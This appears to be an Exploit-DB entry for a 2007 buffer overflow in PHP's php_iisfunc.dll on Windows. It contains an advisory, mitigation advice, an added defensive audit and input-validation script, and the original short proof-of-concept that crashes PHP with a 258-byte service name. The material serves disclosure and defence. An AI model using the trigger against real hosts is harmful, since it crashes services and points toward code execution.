Vendor: PHP
By: boecke <boecke@herzeleid.net>
CVSS: 5.5 (MEDIUM)
CWE: 119 (Buffer Overflow)
Product Name: PHP
Affected Version From: PHP <= 5.2.0
Affected Version To: PHP <= 5.2.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows (win32)
Date: 2007

php_iisfunc.dll PHP <= 5.2.0 (win32) Buffer Overflow PoC

This is a proof-of-concept exploit for a buffer overflow vulnerability in the php_iisfunc.dll extension in PHP versions <= 5.2.0 on the win32 platform. The vulnerability allows an attacker to execute arbitrary code by passing a specially crafted string argument to any of several extension functions that convert their string argument to Unicode into a fixed-size buffer. The specific native functions affected are fnStartService, fnGetServiceState, and fnStopService.

Mitigation:

To mitigate this vulnerability, users should upgrade to a newer version of PHP that is not affected by this issue. Alternatively, users can disable the php_iisfunc.dll extension if it is not required for their application.
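The following script is an added defensive example for administrators of a PHP host that loads php_iisfunc.dll; it is not part of the original advisory or of the PHP project. It reports whether the running PHP build is in the affected range and whether the extension is loaded, and it wraps the extension call behind a length and character check so that an over-long service identifier is refused before it reaches the native Unicode conversion. The function name iis_get_service_state is the one documented in the PHP manual for this extension; the 64-byte cap and the allowed-character pattern are assumptions chosen for real IIS service names (for example W3SVC), not values published by the advisory. The code is written in PHP 5.2-compatible syntax so it can run on an affected host.

```php
<?php
// Added example, not from the original advisory or the PHP project.
// Assumptions: the affected range is PHP <= 5.2.0 (from the advisory);
// MAX_SERVICE_ID_LEN and the allowed-character pattern are conservative
// choices made here, far below the 256-byte filler the PoC needs.

define( 'AFFECTED_MAX_VERSION', '5.2.0' );
define( 'MAX_SERVICE_ID_LEN', 64 );   // assumption: IIS service names are short

// Reports exposure to the php_iisfunc.dll overflow for the given PHP version.
function iisfunc_exposure( $phpVersion = PHP_VERSION )
{
    $versionAffected = version_compare( $phpVersion, AFFECTED_MAX_VERSION, '<=' );
    $loaded          = extension_loaded( 'iisfunc' );

    if ( $versionAffected && $loaded ) {
        $advice = 'Upgrade PHP or remove extension=php_iisfunc.dll from php.ini';
    } elseif ( $loaded ) {
        $advice = 'Extension loaded on a PHP version outside the advisory range';
    } else {
        $advice = 'Extension not loaded; no exposure via php_iisfunc.dll';
    }

    return array(
        'php_version'      => $phpVersion,
        'version_affected' => $versionAffected,
        'extension_loaded' => $loaded,
        'exposed'          => ( $versionAffected && $loaded ),
        'advice'           => $advice,
    );
}

// Validates a service identifier before it is handed to the extension.
// Throws on anything that is not a short, plain ASCII service name.
function guarded_service_id( $serviceId )
{
    if ( !is_string( $serviceId ) ) {
        throw new InvalidArgumentException( 'service id must be a string' );
    }
    if ( strlen( $serviceId ) > MAX_SERVICE_ID_LEN ) {
        throw new InvalidArgumentException(
            'service id exceeds ' . MAX_SERVICE_ID_LEN . ' bytes' );
    }
    if ( !preg_match( '/^[A-Za-z0-9_-]+$/', $serviceId ) ) {
        throw new InvalidArgumentException(
            'service id contains characters outside [A-Za-z0-9_-]' );
    }
    return $serviceId;
}

// Wrapper around the documented extension function (assumed present when the
// extension is loaded); all input passes through guarded_service_id() first.
function guarded_get_service_state( $serviceId )
{
    if ( !function_exists( 'iis_get_service_state' ) ) {
        throw new RuntimeException( 'iisfunc extension not loaded' );
    }
    return iis_get_service_state( guarded_service_id( $serviceId ) );
}

// Usage: print the audit result, then show that an over-long identifier of
// the same size the PoC uses (256 + 2 bytes) is refused before any native call.
print_r( iisfunc_exposure() );

try {
    guarded_service_id( str_repeat( 'A', 258 ) );
    echo "unexpected: over-long id accepted\n";
} catch ( InvalidArgumentException $e ) {
    echo 'refused: ' . $e->getMessage() . "\n";
}

echo 'accepted: ' . guarded_service_id( 'W3SVC' ) . "\n";
?>
```

Run it from the command line (`php audit_iisfunc.php`) on the host in question; the `exposed` flag is true only when both the version check and the extension check fail, which matches the two remediation paths the advisory names.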

Exploit-DB raw data:

<?php
// ==================================================================================
//
//  php_iisfunc.dll PHP <= 5.2.0 (win32) Buffer Overflow PoC
//
//      Discovery: boecke <boecke@herzeleid.net>
//      Risk: Local Buffer Overflow (Medium - High Risk)
//      Notes: Various other functions are exploitable, all of which convert the
//      string argument(s) to unicode.
//
//      extern "C" IISFUNC_API int fnStartService(LPCTSTR ServiceId);
//      extern "C" IISFUNC_API int fnGetServiceState(LPCTSTR ServiceId);
//      extern "C" IISFUNC_API int fnStopService(LPCTSTR ServiceId);
//
//      "Sangre, sonando, de rabia naci.. Who do you trust?"
//       - Cygnus, Vismund Cygnus: Sarcophagi
//
// ==================================================================================

if ( !extension_loaded( "iisfunc" ) )
{
       die( "Extension not loaded.\n" );
}

$buf_unicode = str_repeat( "A", 256 );   // filler that fills the fixed-size buffer used for the unicode copy
$eip_unicode = "\x41\x41";               // two bytes written past the buffer end; "AA" here only crashes

iis_getservicestate( $buf_unicode . $eip_unicode );   // the unicode conversion of the argument overflows

?>

# milw0rm.com [2007-08-27]